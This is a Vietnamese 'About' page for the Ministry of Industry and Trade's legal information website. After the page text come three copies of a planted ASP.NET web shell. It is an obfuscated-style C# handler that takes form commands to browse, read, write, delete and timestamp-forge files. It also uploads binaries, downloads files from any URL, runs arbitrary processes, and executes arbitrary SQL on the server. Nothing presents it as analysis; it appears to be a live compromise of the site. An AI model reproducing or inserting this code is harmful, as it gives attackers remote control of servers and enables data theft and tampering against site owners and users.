Trang chủ » Giới thiệu

Giới thiệu

GIỚI THIỆU VỀ TRANG THÔNG TIN PHÁP LUẬT CÔNG THƯƠNG

 

Bộ Công Thương có chức năng quản lý nhà nước rộng, bao gồm 26 ngành và lĩnh vực cụ thể. Cùng với đó là phạm vi rộng các công cụ quản lý nhà nước trong cả lĩnh vực thương mại và công nghiệp. Bộ Công Thương xây dựng Trang thông tin pháp luật công thương điện tử để hỗ trợ hiệu quả các cơ quan quản lý nhà nước ở trung ương và địa phương trong việc nắm chắc các công cụ quản lý nhà nước trong lĩnh vực công thương; tăng cường cập nhật về hệ thống văn bản công thương trong nước cho các cơ quan đại diện công thương ở nước ngoài; giúp các doanh nghiệp, tổ chức, cá nhân liên quan có cái nhìn tổng thể về hệ thống pháp luật trong lĩnh vực công thương.

Trang thông tin pháp luật công thương có các chuyên mục:

1. Văn bản pháp quy: bao gồm toàn bộ các văn bản quy phạm pháp luật phục vụ quản lý nhà nước trong lĩnh vực công thương;

2. Dự thảo văn bản: đăng đầy đủ các dự thảo văn bản mà Bộ Công Thương đang chủ trì soạn thảo theo đúng quy định của Luật ban hành văn bản quy phạm pháp luật;

3. Tin tức: gồm thông tin về Chương trình xây dựng văn bản quy phạm pháp luật của Bộ Công Thương, của các cơ quan khác và thông tin phổ biến pháp luật;

4. Hỏi đáp: là một hình thức hỗ trợ pháp lý thông qua việc hỏi đáp về pháp luật công thương.

Bên cạnh đó, người sử dụng còn được hỗ trợ tìm kiếm văn bản quy phạm pháp luật trong lĩnh vực công thương.

Với những tiện ích của mình, hy vọng Trang thông tin pháp luật công thương sẽ là địa chỉ tin cậy của đông đảo người sử dụng.

Trang thông tin pháp luật công thương được xây dựng và duy trì bởi Vụ Pháp chế - Bộ Công Thương. Để phục vụ người sử dụng ngày càng tốt hơn, chúng tôi mong nhận được các ý kiến góp ý để tiếp tục hoàn thiện Trang thông tin này.

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext context) { String Z = context.Request.Form["z"]; if (Z != "") { String Z1 = context.Request.Form["Z1"]; String Z2 = context.Request.Form["Z2"]; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c[i][0] + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte[Z2.Length / 2]; for (int i = 0; i < Z2.Length; i += 2) { B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte[1024]; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x[0], strDb = x[1]; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows[i][2].ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb; p[2] = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x[0], strDb = x[1]; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables[0].Rows; for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", rows[i][c].ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } } }

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext context) { String Z = context.Request.Form["z"]; if (Z != "") { String Z1 = context.Request.Form["Z1"]; String Z2 = context.Request.Form["Z2"]; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c[i][0] + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte[Z2.Length / 2]; for (int i = 0; i < Z2.Length; i += 2) { B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte[1024]; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x[0], strDb = x[1]; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows[i][2].ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb; p[2] = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x[0], strDb = x[1]; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables[0].Rows; for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", rows[i][c].ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } } }

<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Diagnostics; public class Handler : IHttpHandler { public void ProcessRequest(HttpContext context) { String Z = context.Request.Form["z"]; if (Z != "") { String Z1 = context.Request.Form["Z1"]; String Z2 = context.Request.Form["Z2"]; String R = ""; try { switch (Z) { case "A": { String[] c = Directory.GetLogicalDrives(); R = String.Format("{0}\t", context.Server.MapPath("/")); for (int i = 0; i < c.Length; i++) R += c[i][0] + ":"; break; } case "B": { DirectoryInfo m = new DirectoryInfo(Z1); foreach (DirectoryInfo D in m.GetDirectories()) { R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); } foreach (FileInfo D in m.GetFiles()) { R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); } break; } case "C": { StreamReader m = new StreamReader(Z1, Encoding.Default); R = m.ReadToEnd(); m.Close(); break; } case "D": { StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); m.Write(Z2); R = "1"; m.Close(); break; } case "E": { if (Directory.Exists(Z1)) { Directory.Delete(Z1, true); } else { File.Delete(Z1); } R = "1"; break; } case "F": { context.Response.Clear(); context.Response.Write("\x2D\x3E\x7C"); context.Response.WriteFile(Z1); context.Response.Write("\x7C\x3C\x2D"); goto End; } case "G": { byte[] B = new byte[Z2.Length / 2]; for (int i = 0; i < Z2.Length; i += 2) { B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16); } FileStream fs = new FileStream(Z1, FileMode.Create); fs.Write(B, 0, B.Length); fs.Close(); R = "1"; break; } case "H": { CP(Z1, Z2, context); R = "1"; break; } case "I": { if (Directory.Exists(Z1)) { Directory.Move(Z1, Z2); } else { File.Move(Z1, Z2); } break; } case "J": { Directory.CreateDirectory(Z1); R = "1"; break; } case "K": { DateTime TM = Convert.ToDateTime(Z2); if (Directory.Exists(Z1)) { Directory.SetCreationTime(Z1, TM); Directory.SetLastWriteTime(Z1, TM); Directory.SetLastAccessTime(Z1, TM); } else { File.SetCreationTime(Z1, TM); File.SetLastWriteTime(Z1, TM); File.SetLastAccessTime(Z1, TM); } R = "1"; break; } case "L": { HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1)); RQ.Method = "GET"; RQ.ContentType = "application/x-www-form-urlencoded"; HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse(); Stream WF = WB.GetResponseStream(); FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write); int i; byte[] buffer = new byte[1024]; while (true) { i = WF.Read(buffer, 0, buffer.Length); if (i < 1) { break; } FS.Write(buffer, 0, i); } WF.Close(); WB.Close(); FS.Close(); R = "1"; break; } case "M": { ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2)); Process e = new Process(); StreamReader OT, ER; c.UseShellExecute = false; c.RedirectStandardOutput = true; c.RedirectStandardError = true; e.StartInfo = c; c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2); e.Start(); OT = e.StandardOutput; ER = e.StandardError; e.Close(); R = OT.ReadToEnd() + ER.ReadToEnd(); break; } case "N": { String strDat = Z1.ToUpper(); SqlConnection Conn = new SqlConnection(Z1); Conn.Open(); R = Conn.Database + "\t"; Conn.Close(); break; } case "O": { String[] x = Z1.Replace("\r", "").Split('\n'); String strConn = x[0], strDb = x[1]; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns"); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0}\t", dt.Rows[i][2].ToString()); } break; } case "P": { String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4]; String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb; p[2] = strTable; SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); DataTable dt = Conn.GetSchema("Columns", p); Conn.Close(); for (int i = 0; i < dt.Rows.Count; i++) { R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString()); } break; } case "Q": { String[] x = Z1.Replace("\r", "").Split('\n'); String strDat, strConn = x[0], strDb = x[1]; int i, c; strDat = Z2.ToUpper(); SqlConnection Conn = new SqlConnection(strConn); Conn.Open(); if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0) { SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn); DataSet ds = new DataSet(); OD.Fill(ds); if (ds.Tables.Count > 0) { DataRowCollection rows = ds.Tables[0].Rows; for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); } R += "\r\n"; for (i = 0; i < rows.Count; i++) { for (c = 0; c < ds.Tables[0].Columns.Count; c++) { R += String.Format("{0}\t|\t", rows[i][c].ToString()); } R += "\r\n"; } } ds.Clear(); ds.Dispose(); } else { SqlCommand cm = Conn.CreateCommand(); cm.CommandText = Z2; cm.ExecuteNonQuery(); R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; } Conn.Close(); break; } default: goto End; } } catch(Exception E) { R="ERROR:// "+E.Message; } context.Response.Write("\x2D\x3E\x7C"+R+"\x7C\x3C\x2D"); End:; } } public bool IsReusable { get { return false; } } public void CP(String S,String D,HttpContext context) { if(Directory.Exists(S)) { DirectoryInfo m=new DirectoryInfo(S); Directory.CreateDirectory(D); foreach(FileInfo F in m.GetFiles()) { File.Copy(S+"\\"+F.Name,D+"\\"+F.Name); } foreach(DirectoryInfo F in m.GetDirectories()) { CP(S + "\\" + F.Name, D + "\\" + F.Name, context); } } else { File.Copy(S,D); } } }